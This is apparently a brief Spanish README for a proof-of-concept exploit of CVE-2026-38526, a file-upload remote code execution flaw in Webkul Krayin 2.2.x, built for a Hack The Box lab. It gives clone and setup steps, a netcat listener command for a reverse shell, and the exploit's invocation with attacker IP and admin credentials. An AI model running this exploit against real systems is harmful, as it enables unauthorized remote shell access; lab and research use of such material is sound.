
Un script PoC para CVE-2026-38526, RCE a través de una vulnerabilidad de carga de archivos en el endpoint /admin/tinymce/upload de webkul krayin 2.2.x
Un script PoC para CVE-2026-38526, RCE a través de una vulnerabilidad de carga de archivos en el endpoint /admin/tinymce/upload de webkul krayin 2.2.x (construido para htb-nexus)
git clone https://github.com/Resolvdd/CVE-2026-38526-PoC-htb-nexus.git
cd CVE-2026-38526-PoC-htb-nexus
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
nc -lvnp <port number> (Default: 9001)
python3 poc.py -i <your-ip> -p <listener-port-number> -e <valid-krayin-email> -P <valid-krayin-password> -u <url-excluding-protocol Default: http>